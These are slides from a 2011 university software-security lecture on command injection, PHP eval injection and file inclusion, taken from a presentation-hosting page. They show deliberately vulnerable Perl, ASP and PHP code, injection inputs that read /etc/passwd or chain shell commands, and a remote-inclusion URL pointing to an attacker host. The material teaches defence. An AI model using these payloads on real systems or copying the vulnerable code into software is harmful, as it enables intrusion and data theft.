1 / 19

Software Security Lecture 4

Software Security Lecture 4. Fang Yu Dept. of MIS, National Chengchi University Spring 2011. Outline. Today we will have Adam presenting how to attack authentications (Ch6)

tiara
Télécharger la présentation

Software Security Lecture 4

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Software SecurityLecture 4 Fang Yu Dept. of MIS, National Chengchi University Spring 2011

  2. Outline • Today we will have Adam presenting how to attack authentications (Ch6) • Before his presentation, I will continue Command Injections (Ch9), and also I will present my recent research on how to prevent and remove injection vulnerabilities • The rest of your presentations have been scheduled. Please check the course web page and plan ahead. Let me know if you have any question. • The course website : • http://soslab.nccu.edu.tw/Courses.html

  3. Injecting Code II Chapter 9 The Web Application Hacker’s Handbook

  4. Interpreted Languages Recall that an interpreted language is one whose execution involved a runtime component that interprets the code of the language and carries out the instructions that it contains For example, SQL, Perl, ASP, PHP, etc.

  5. Interpreted Languages In most applications, the code processed by the interpreter is a mix of instructions written by a programmer and data supplied by a user. An attacker can supply crafted input that breaks out of the data context, usually by supplying some syntax that has a special significancewithin the grammar of the interpreted language.

  6. Command Injection Attacks Main problem: Incorrect or completely lack of validation of user input that results in the execution of commands on the server We have discussed SQL injections last week. Today we will discuss OS command, Web scripting language, SOAP and SMTP injection attacks.

  7. OS command: Injecting via Perl #!/usr/bin/perl use strict; use CGI qw(:standard escapeHTML); print header, start_html(“”); print “<pre>”; my $command = “du -h --exclude php* /var/www/html”; $command= $command.param(“dir”); $command=`$command`; print “$command\n”; print end_html; Consider a Perl CGI Code that allows administrators to specify a directory and view a summary of its disk usages

  8. When used as intended:

  9. Injecting via Perl “|” is used to redirect the output of a process to the input of another process This enables multiple commands to be chained together

  10. Inject code: (cat /etc/passwd)

  11. OS Command: Injecting via ASP <% Set oScript = Server.CreateObject(“WSCRIPT.SHELL”) Set oFileSys = Server.CreateObject(“Scripting.FileSystemObject”) szCMD = “type c:\inetpub\wwwroot\logs\“ & Request.Form(“FileName”) szTempFile = “C:\“ & oFileSys.GetTempName() Call oScript.Run(“cmd.exe /c “ & szCMD & “ > “ & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) %> Consider an ASP code that allows administrators to view the contents of a requested log file type the log file cmdexecutes the command

  12. When used as intended: (submit last5.log)

  13. Use && to batch multiple commands together • Last5.log && dir c:\

  14. Dynamic Execution Vulnerabilities https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh $storedsearch = $_GET[‘storedsearch’]; eval(“$storedsearch;”); • The PHP function eval() is used to dynamically execute code that is passed to the function at runtime • Consider a search function that enables users to create stored searches: • The server side implementation: • creating a mysearch variable with the value wahh

  15. Dynamic execution in PHP https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh; %20echo%20file_get_contents(‘/etc/passwd’) https://wahh-app.com/search.php?storedsearch=\$mysearch%3dwahh; %20system(‘cat%20/etc/passwd’) The semicolon character can be used to batch commands together in a single parameter. For example, to retrieve the contents of the file /etc/password, you could use either the file_get_contentsorthe system command:

  16. File Inclusion Attacks https://wahh-app.com/main.php?Country=US $country = $_GET[‘Country’]; include( $country . ‘.php’ ); Consider an application that delivers different content to people in different locations A request looks like: The application processes as follows:

  17. File Inclusion Attacks https://wahh-app.com/main.php?Country=http://wahh-attacker.com/backdoor $country = $_GET[‘Country’]; include(http://wahh-attacker.com/backdoor .‘.php’ ); If the request has been intercepted: The sever side may include an arbitrary remote file

  18. Quiz What’s the main cause of injection vulnerabilities? How to prevent injection vulnerabilities? Let’s talk a little bit about Stranger

  19. Next week We will have Juilette presenting Attacking Session Management (Chapter 7), Jorina presenting Attacking Access Controls (Chapter 8) We will also haveHsingHunag presenting Burp Suite, a tool set for analyzing and attacking web applications

More Related